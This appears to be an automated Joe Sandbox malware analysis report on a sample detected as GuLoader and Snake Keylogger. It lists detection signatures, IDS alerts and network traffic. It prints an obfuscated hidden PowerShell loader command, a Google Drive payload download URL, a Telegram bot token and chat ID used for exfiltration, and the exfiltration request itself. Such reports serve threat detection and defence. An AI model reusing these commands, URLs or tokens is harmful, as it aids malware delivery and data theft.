Edit tour

Windows Analysis Report
RmIYOfX0yO.exe

Overview

General Information

Sample name:	RmIYOfX0yO.exe renamed because original name is a hash value
Original sample name:	f5f3c3a8c7f9f5fb9531fa0d57012ce0869b52b23d05e6c9b7a0220ac917db6d.exe
Analysis ID:	1587700
MD5:	5e2ff1914fc1f8ebadf282f4096d6fc8
SHA1:	77d61bdf0ce63eed5324b56623b878fc3dc79890
SHA256:	f5f3c3a8c7f9f5fb9531fa0d57012ce0869b52b23d05e6c9b7a0220ac917db6d
Tags:	exeuser-adrian__luca
Infos:

Detection

GuLoader, Snake Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Early bird code injection technique detected

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected GuLoader

Yara detected Snake Keylogger

AI detected suspicious sample

Found suspicious powershell code related to unpacking or dynamic code loading

Loading BitLocker PowerShell Module

Powershell drops PE file

Queues an APC in another process (thread injection)

Suspicious powershell command line found

Tries to detect the country of the analysis system (by using the IP)

Uses the Telegram API (likely for C&C communication)

Writes to foreign memory regions

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to shutdown / reboot the system

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Msiexec Initiated Connection

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Classification

Process Tree

System is w10x64

RmIYOfX0yO.exe (PID: 7380 cmdline: "C:\Users\user\Desktop\RmIYOfX0yO.exe" MD5: 5E2FF1914FC1F8EBADF282F4096D6FC8)

powershell.exe (PID: 7472 cmdline: powershell.exe -windowstyle hidden "$Vulcanological=gc -raw 'C:\Users\user\AppData\Local\magmaet\clenched\Storvildtjagten180.Agg';$Accusor=$Vulcanological.SubString(74166,3);.$Accusor($Vulcanological) " MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

msiexec.exe (PID: 1480 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "Telegram", "Token": "8179583980:AAG4cdQWaAviOBBhSs3OrT1OX6_IUptNQv8", "Chat_id": "6070006284", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000009.00000002.2578808051.0000000025A81000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000002.00000002.2191615306.000000000D623000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security

Sigma Signatures

System Summary

Sigma detected: Msiexec Initiated Connection

Source: Network Connection

Author: frack113: Data: DestinationIp: 142.250.186.78, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 1480, Protocol: tcp, SourceIp: 192.168.2.11, SourceIsIpv6: false, SourcePort: 49981

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7472, TargetFilename: C:\Users\user\AppData\Local\magmaet\clenched\RmIYOfX0yO.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -windowstyle hidden "$Vulcanological=gc -raw 'C:\Users\user\AppData\Local\magmaet\clenched\Storvildtjagten180.Agg';$Accusor=$Vulcanological.SubString(74166,3);.$Accusor($Vulcanological) ", CommandLine: powershell.exe -windowstyle hidden "$Vulcanological=gc -raw 'C:\Users\user\AppData\Local\magmaet\clenched\Storvildtjagten180.Agg';$Accusor=$Vulcanological.SubString(74166,3);.$Accusor($Vulcanological) ", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\RmIYOfX0yO.exe", ParentImage: C:\Users\user\Desktop\RmIYOfX0yO.exe, ParentProcessId: 7380, ParentProcessName: RmIYOfX0yO.exe, ProcessCommandLine: powershell.exe -windowstyle hidden "$Vulcanological=gc -raw 'C:\Users\user\AppData\Local\magmaet\clenched\Storvildtjagten180.Agg';$Accusor=$Vulcanological.SubString(74166,3);.$Accusor($Vulcanological) ", ProcessId: 7472, ProcessName: powershell.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T17:09:16.958454+0100	2803305	3	Unknown Traffic	192.168.2.11	49985	104.21.80.1	443	TCP
2025-01-10T17:09:27.623481+0100	2803305	3	Unknown Traffic	192.168.2.11	49997	104.21.80.1	443	TCP
2025-01-10T17:09:28.856245+0100	2803305	3	Unknown Traffic	192.168.2.11	49999	104.21.80.1	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T17:09:14.955499+0100	2803274	2	Potentially Bad Traffic	192.168.2.11	49983	158.101.44.242	80	TCP
2025-01-10T17:09:16.346143+0100	2803274	2	Potentially Bad Traffic	192.168.2.11	49983	158.101.44.242	80	TCP
2025-01-10T17:09:17.539679+0100	2803274	2	Potentially Bad Traffic	192.168.2.11	49986	158.101.44.242	80	TCP

ETPRO MALWARE Common Downloader Header Pattern UHCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T17:09:09.446890+0100	2803270	2	Potentially Bad Traffic	192.168.2.11	49981	142.250.186.78	443	TCP

Joe Security ANOMALY Telegram Send Message

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T17:09:29.775129+0100	1810007	1	Potentially Bad Traffic	192.168.2.11	50000	149.154.167.220	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000009.00000002.2578808051.0000000025A81000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "8179583980:AAG4cdQWaAviOBBhSs3OrT1OX6_IUptNQv8", "Chat_id": "6070006284", "Version": "4.4"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\magmaet\clenched\RmIYOfX0yO.exe

ReversingLabs: Detection: 65%

Multi AV Scanner detection for submitted file

Source: RmIYOfX0yO.exe	Virustotal: Detection: 73%			Perma Link
Source: RmIYOfX0yO.exe	ReversingLabs: Detection: 65%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 98.6% probability

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: RmIYOfX0yO.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.11:49984 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 142.250.186.78:443 -> 192.168.2.11:49981 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.186.33:443 -> 192.168.2.11:49982 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.11:50000 version: TLS 1.2

Source: RmIYOfX0yO.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: indows\System.Core.pdbIw source: powershell.exe, 00000002.00000002.2189051951.0000000008161000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: %lqm.Core.pdb source: powershell.exe, 00000002.00000002.2189051951.0000000008161000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: CallSite.Targetore.pdb source: powershell.exe, 00000002.00000002.2184195240.0000000006F59000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\RmIYOfX0yO.exe	Code function: 0_2_00405974 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405974
Source: C:\Users\user\Desktop\RmIYOfX0yO.exe	Code function: 0_2_004064C6 FindFirstFileW,FindClose,	0_2_004064C6
Source: C:\Users\user\Desktop\RmIYOfX0yO.exe	Code function: 0_2_004027FB FindFirstFileW,	0_2_004027FB

Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 02E9F45Dh		9_2_02E9F2C0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 02E9F45Dh		9_2_02E9F4AC

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.11:50000 -> 149.154.167.220:443

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:216554%0D%0ADate%20and%20Time:%2011/01/2025%20/%2002:20:41%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20216554%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 158.101.44.242 158.101.44.242

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49986 -> 158.101.44.242:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49983 -> 158.101.44.242:80
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49981 -> 142.250.186.78:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:49985 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:49997 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:49999 -> 104.21.80.1:443

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=106pvcp-FFRq3kk2pQXd-hO-8ZfrGUfIC HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=106pvcp-FFRq3kk2pQXd-hO-8ZfrGUfIC&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown

HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.11:49984 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=106pvcp-FFRq3kk2pQXd-hO-8ZfrGUfIC HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=106pvcp-FFRq3kk2pQXd-hO-8ZfrGUfIC&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:216554%0D%0ADate%20and%20Time:%2011/01/2025%20/%2002:20:41%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20216554%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: drive.google.com
Source: global traffic	DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 10 Jan 2025 16:09:29 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: msiexec.exe, 00000009.00000002.2578808051.0000000025C30000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025B38000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025BC7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025BE6000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025BF4000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025BD8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025C3E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.com
Source: msiexec.exe, 00000009.00000002.2578808051.0000000025B29000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025C30000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025B38000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025BC7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025C02000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025BE6000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025BF4000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025BD8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025B7B000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025C3E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: RmIYOfX0yO.exe, 00000000.00000000.1293647794.000000000040A000.00000008.00000001.01000000.00000003.sdmp, RmIYOfX0yO.exe, 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000002.00000002.2182314572.0000000005919000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000002.00000002.2178786128.0000000004A06000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: msiexec.exe, 00000009.00000002.2578808051.0000000025C30000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025BC7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025BE6000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025BF4000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025BD8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025C3E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2578808051.0000000025B50000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://reallyfreegeoip.org
Source: powershell.exe, 00000002.00000002.2178786128.0000000004A06000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000002.00000002.2178786128.00000000048B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.2178786128.0000000004A06000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000002.00000002.2178786128.0000000004A06000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.2178315725.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2188167978.0000000008022000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.co
Source: powershell.exe, 00000002.00000002.2178315725.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.cod
Source: powershell.exe, 00000002.00000002.2178786128.00000000048B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lBlq
Source: powershell.exe, 00000002.00000002.2178786128.0000000004A06000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: msiexec.exe, 00000009.00000003.2338030802.0000000009D89000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com
Source: powershell.exe, 00000002.00000002.2182314572.0000000005919000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.2182314572.0000000005919000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.2182314572.0000000005919000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: msiexec.exe, 00000009.00000002.2564635002.0000000009D48000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/
Source: msiexec.exe, 00000009.00000003.2338030802.0000000009D89000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2564635002.0000000009D37000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2564635002.0000000009D48000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=106pvcp-FFRq3kk2pQXd-hO-8ZfrGUfIC&export=download
Source: msiexec.exe, 00000009.00000003.2372781160.0000000009D41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=106pvcp-FFRq3kk2pQXd-hO-8ZfrGUfIC&export=download~a
Source: powershell.exe, 00000002.00000002.2178786128.0000000004A06000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.2182314572.0000000005919000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
